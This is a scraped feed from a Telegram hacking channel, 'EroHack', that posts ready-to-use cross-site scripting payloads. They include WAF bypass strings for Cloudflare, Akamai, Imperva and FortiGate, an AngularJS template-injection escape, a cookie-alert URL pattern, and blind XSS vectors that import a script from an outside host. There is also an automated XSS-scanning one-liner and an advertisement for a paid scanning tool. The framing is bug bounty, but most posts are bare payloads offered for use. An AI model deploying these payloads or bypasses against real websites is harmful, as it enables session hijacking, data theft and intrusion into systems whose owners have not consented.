Eʀᴏ ··ʜᴀᴄᴋ··
@EroHack0
4.96K subscribers
65 photos
27 videos
10 files
104 links
🗡 A blackish gray hat hacker 🗡

🎯 Bug Bounty | Ethical Hacking | Web Exploits
📚 Tips, Writeups, Tools & Real Reports

Admin: @GoRunEro
加入频道
About
Blog
Apps
Platform
Join
Eʀᴏ ··ʜᴀᴄᴋ··
4.96K subscribers
Eʀᴏ ··ʜᴀᴄᴋ··
This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background

Payload :

'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

#Payload #xss
——————‌
@EroHack0
👉 Boost
👍183🔥2🗿1
1.12K views
Eʀᴏ ··ʜᴀᴄᴋ··
Nice collection of XSS filters bypasses 💎

Github

#Bypass #xss
——————‌
@EroHack | Boost
GitHub
GitHub - Edr4/XSS-Bypass-Filters
Contribute to Edr4/XSS-Bypass-Filters development by creating an account on GitHub.
🔥178138👍1376
2.6K viewsedited  
Eʀᴏ ··ʜᴀᴄᴋ··
🤖Here's another Blind XSS vector!

1"/import(src)'<Script/Src=//X55.is?1=00><Img/OnLoad='


🫦Where 00 is your unique KNOXSS id.
➡️If it fails with <Script it might pop with <Img in a multi reflection scenario!

#XSS

🔈 @EroHack
Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥932
1.51K views
Eʀᴏ ··ʜᴀᴄᴋ··
Payload:
"%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

#XSS

🌐@EroHack
Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
933👍1
1.42K views
Eʀᴏ ··ʜᴀᴄᴋ··
👺xss oneliner command

echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vuln


⬇️ Download ( Tools )
🔒 BugCod3 ( ZIP )

#XSS #BugBounty

🌐@EroHack
➡️Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
8👍3
1.8K views
Eʀᴏ ··ʜᴀᴄᴋ··
☠️Parameter: invitedby=

Payload=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


Full_url= https://site. com/?invitedby=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


#XSS #BugBounty

❤️@EroHack
✔️Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
7🤯4
1.72K views
Eʀᴏ ··ʜᴀᴄᴋ··
Nice collection of XSS filters bypasses 💎

Github

#Bypass #xss
——————‌
@EroHack | Boost
GitHub
GitHub - Edr4/XSS-Bypass-Filters
Contribute to Edr4/XSS-Bypass-Filters development by creating an account on GitHub.
👍5🔥2👎1🤯1
2.33K views
Eʀᴏ ··ʜᴀᴄᴋ··
🟫 WAF Fortinet FortiGate XSS Bypass

🖥Payload
<details open ontoggle="(()=>alertibrahimxss)()"></details>

#XSS #WAF #Payload
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
5👍3🔥1
3.72K views
Eʀᴏ ··ʜᴀᴄᴋ··
🙂One XSS Payload for bypass ( Akamai, imperva, cloudflare & Waf ) 🚪

HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>


#Xss #Payload #Waf

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥62🤯1
3.11K views
Eʀᴏ ··ʜᴀᴄᴋ··
⚠️XSS Bypass Akamai, Imperva and CloudFlare

☠️Payload
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>


#XSS #Payload
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
💯5🔥2🫡1🗿1
3.14K viewsedited  
Eʀᴏ ··ʜᴀᴄᴋ··
😀XSS in Office.com. The + made a difference.

Payload:‍‍‍
`'>+<script>alert()</script>`

#BugBounty #Tips #XSS

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8💯2🎃1
3.9K views
Eʀᴏ ··ʜᴀᴄᴋ··
🔥CLOUDFLARE BYPASS (Xss)

🖥PAYLOAD:
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>


#Bypass #Xss #cloudflare
✍️✍️✍️✍️✍️✍️✍️✍️✍️✍️
🔝EroHack
💜Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍2💯2🫡1
4.69K views
Eʀᴏ ··ʜᴀᴄᴋ··
⚠️AngularJS Client-Side Template Injection as XSS payload for 1.2.24-1.2.29

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}


#Xss #Payload

EroHack
🗯Boost
📣Twitter
🔥51👍1💯1🤨1
4.73K views
Eʀᴏ ··ʜᴀᴄᴋ··
Media is too big
VIEW IN TELEGRAM
Introducing the "VulnScan" tool

توضیحات:
ابزار "VulnScan" یک که در زمینه جمع آوری اطلاعات از یک سایت طراحی شده و به شما کمک میکنه اطلاعات مهمی از تارگت خودتون پیدا کنید.
امکانت ابزار از جمله پورت‌اسکن، آسیب پذیری باگ LFI، آسیب پذیری باگ XSS و غیره است.
اطلاعات تکمیلی رو میتونید در فیلم بالا مشاهده کنید.
برای تهیه ابزار میتونید به آیدی زیر پیام بدید.


Description:
The VulnScan tool is designed to gather information from a site and help you find important information about your target.
Features of this tool include port scanning, "LFI" bug vulnerability, "XSS" bug vulnerability, etc.
Additional information can be seen in the video above.
To get the tool, you can send a message to the following address. There is a discount for the first ten people.


#tool #webhacking #bugbounty #XSS

🆔 @gorunero
EroHack
🗯Boost
📣Twitter
👍8🔥2👾1
6.58K views
Eʀᴏ ··ʜᴀᴄᴋ··
Xss Attack
SHAYAN
🤔تو همونی که فکر می‌کنی alert("XSS") فقط یه شوخیه؟
بیا گوش بده ببینی چطور یه خط ساده تونست پنل ادمینو بترکونه! 😈💻

🎙️ Ero Podcast | اپیزود: "یه فرم ساده، یه اشتباه مرگبار"

#XSS #HackFun #BugHuntLife #EroHack
👍51💯1
2.98K views
Eʀᴏ ··ʜᴀᴄᴋ··
📌 چه Xss payload هایی در ساله ۲۰۲۵ جواب میدن؟
مقاله‌ای جدید و رایگان درباره تکنیک‌های به‌روز XSS، دور زدن فیلترها، DOM XSS و نکات کاربردی برای تست نفوذ و باگ‌بانتی.

A fresh and insightful article exploring the current state of XSS in 2025. It dives into modern payloads that still work, techniques to bypass filters and CSP, and real-world examples of DOM-based XSS. A valuable read for penetration testers, red teamers, and bug bounty hunters.


📖 لینک مقاله:
https://santhosh-adiga-u.medium.com/xss-in-2025-the-payloads-that-still-work-3aa343e0b4f2

#Erohack #xss #payload
Medium
XSS in 2025 — The Payloads That Still Work
Because alert(1) is dead, but XSS isn’t.
4🎃3👍1💯1
2.93K views